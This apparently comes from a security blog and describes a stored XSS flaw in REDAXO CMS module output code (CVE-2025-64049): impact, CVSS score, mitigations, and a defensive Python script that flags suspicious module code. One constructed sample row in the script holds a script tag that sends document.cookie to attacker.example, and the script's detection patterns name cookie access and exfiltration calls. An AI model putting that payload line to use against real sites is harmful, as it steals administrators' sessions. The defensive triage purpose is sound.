
REDAXO CMS Under Attack: Stored XSS Bug Threatens Websites (CVE-2025-64049)

Overview

A stored cross-site scripting (XSS) vulnerability has been discovered in REDAXO CMS version 5.20.0, in the module management component. The flaw, tracked as CVE-2025-64049, allows an attacker who can edit modules to inject JavaScript through a module’s “Output code” field. When a legitimate backend user views or edits an article that contains a slice based on the tampered module, the injected script executes in that user’s browser, which can lead to account compromise, data theft, or website defacement.

Technical Details

The vulnerability stems from insufficient sanitization of the module’s “Output code” field. An attacker with module-editing rights can place arbitrary HTML and JavaScript in this field. Whenever a REDAXO administrator or content editor adds a slice using the module to an article and then views or edits that article, the payload embedded in the module output runs in their browser session. Because the payload is persisted on the server as part of the module definition and delivered to every user who opens an affected article, this is a stored (persistent) XSS rather than a reflected one.

CVSS Analysis

  • CVE ID: CVE-2025-64049
  • Severity: MEDIUM
  • CVSS Score: 4.8
  • CVSS Vector: not reproduced in this write-up; consult the official advisory for the full vector string.

The CVSS score of 4.8 places the issue at medium severity. The attack is network-reachable and the attack complexity is low, since the payload is submitted through an ordinary backend form. What keeps the score in the medium range is that exploitation requires both privileges (an account able to edit modules) and user interaction (a victim opening an article that uses the module). Given that the victims are typically administrators and editors, the impact on confidentiality and integrity is still significant.

Possible Impact

Successful exploitation of this XSS vulnerability can have several serious consequences:

  • Account Compromise: An attacker could steal a logged-in administrator’s session cookie, or, where the cookie is protected by the HttpOnly flag, issue requests from within the victim’s browser session to perform privileged actions, gaining control over the REDAXO CMS.
  • Data Theft: Sensitive data displayed within the affected REDAXO instance could be accessed and exfiltrated by the attacker.
  • Website Defacement: The attacker could inject malicious content to deface the website.
  • Malware Distribution: The attacker could inject malicious scripts to redirect users to malicious websites or install malware on their systems.

Mitigation and Patch Steps

The recommended course of action is to upgrade to the REDAXO release that fixes CVE-2025-64049; check the project’s security advisory for the exact version. If an upgrade cannot be scheduled immediately, the following measures reduce exposure in the meantime:

  • Restrict Module Editing: Limit module-editing permissions to a small set of highly trusted administrators, and review the existing module list for unexpected changes, noting who last edited each module and when.
  • Input Sanitization (Difficult without Code Changes): The “Output code” field exists to hold a module’s template markup and PHP, so any filter applied to it would have to distinguish legitimate template code from injected script. That is not practical outside the core codebase, which is why the fix belongs in an official release.
  • Web Application Firewall (WAF): A WAF with XSS rules can block common payloads submitted to the module editor. This is defense in depth only: a user who is allowed to submit arbitrary template code can often evade signature-based rules, so it is not a substitute for patching.

Monitor the REDAXO project’s official website and GitHub repository for security updates. The most effective solution is always to apply the official patch as soon as it becomes available.
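The following Python script is an added example, not code from the REDAXO project or from this advisory. It supports two of the points above: it scans module rows for the kind of injected script the Technical Details section describes, and it answers the “who changed which module, and when” question implied by the module-editing mitigation. Rows are expected in the shape of REDAXO’s rex_module table (columns id, name, output, updateuser, updatedate); the sample rows, the editor names and the attacker.example host are constructed for illustration, and the indicator patterns are a triage heuristic, not a definition of the vulnerability.

```python
"""Triage REDAXO module "Output code" for stored-XSS indicators (CVE-2025-64049 context).

Added example, not REDAXO project code. Rows are expected in the shape of
REDAXO's rex_module table (columns id, name, output, updateuser, updatedate);
the SAMPLE_MODULES below are constructed for illustration.
"""
import re
from dataclasses import dataclass
from datetime import datetime

# Module output legitimately contains HTML, PHP and sometimes <script>, so these
# are triage signals for a human reviewer, not proof of compromise.
INDICATORS = {
    "script_tag":      re.compile(r"<script\b", re.I),
    "external_script": re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?\s*(?:https?:)?//", re.I),
    "event_handler":   re.compile(r"\son[a-z]+\s*=", re.I),
    "javascript_uri":  re.compile(r"(?:href|src|action)\s*=\s*['\"]?\s*javascript:", re.I),
    "cookie_access":   re.compile(r"document\.cookie", re.I),
    "exfil_call":      re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon)\s*\(", re.I),
    "decoder":         re.compile(r"\b(?:eval|atob|unescape|String\.fromCharCode)\s*\(", re.I),
}
# Any one of these alone should trigger an immediate look at the module.
HIGH_RISK = {"external_script", "javascript_uri", "cookie_access", "exfil_call", "decoder"}

DATE_FMT = "%Y-%m-%d %H:%M:%S"  # rex_module.updatedate is a DATETIME column


@dataclass
class Finding:
    module_id: int
    name: str
    indicators: list
    severity: str
    updateuser: str
    updatedate: str


def classify(hits):
    """Rank a module: 'high' if any high-risk indicator fired, else 'low'."""
    return "high" if HIGH_RISK & set(hits) else "low"


def audit_modules(rows, changed_since=None):
    """Return a Finding for every module whose output matches an indicator.

    changed_since (same format as updatedate) limits the sweep to modules edited
    inside a suspected compromise window: the first questions in triage are what
    changed, who changed it, and when.
    """
    cutoff = datetime.strptime(changed_since, DATE_FMT) if changed_since else None
    findings = []
    for row in rows:
        if cutoff and datetime.strptime(row["updatedate"], DATE_FMT) < cutoff:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(row["output"])]
        if hits:
            findings.append(Finding(row["id"], row["name"], hits, classify(hits),
                                    row["updateuser"], row["updatedate"]))
    return findings


def format_finding(f):
    """One report line per module, naming the editor to follow up with."""
    return (f"[{f.severity.upper():4}] module {f.module_id} '{f.name}' "
            f"indicators={','.join(f.indicators)} last edit by {f.updateuser} at {f.updatedate}")


# Constructed sample rows: a plain text module, one with a benign inline script,
# and one carrying a cookie-exfiltration payload of the kind the advisory describes.
SAMPLE_MODULES = [
    {"id": 1, "name": "Text", "updateuser": "admin", "updatedate": "2025-09-01 09:12:00",
     "output": '<div class="text">REX_VALUE[id=1 output=html]</div>'},
    {"id": 2, "name": "Gallery", "updateuser": "editor", "updatedate": "2025-10-10 14:03:00",
     "output": '<div class="rex-gallery">REX_MEDIALIST[1]</div>\n'
               "<script>document.querySelectorAll('.rex-gallery img')"
               ".forEach(function (img) { img.loading = 'lazy'; });</script>"},
    {"id": 3, "name": "Text", "updateuser": "contractor", "updatedate": "2025-10-25 23:41:00",
     "output": '<div class="text">REX_VALUE[id=1 output=html]</div>\n'
               "<script>fetch('https://attacker.example/c?d=' "
               "+ encodeURIComponent(document.cookie));</script>"},
]

if __name__ == "__main__":
    for finding in audit_modules(SAMPLE_MODULES):
        print(format_finding(finding))
```

Run against a real export, the script flags the Gallery module as low (a script tag is present but nothing else) and the tampered Text module as high, and the changed_since filter narrows the list to modules edited inside the window you are investigating. Every hit still needs a human to read the module output; the point is to shorten the list, not to replace the review.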

About the Author

Cybersecurity specialist and founder of Gowri Shankar Infosec, a professional blog dedicated to sharing actionable insights on cybersecurity, data protection, server administration, and compliance frameworks including SOC 2, PCI DSS, and GDPR.
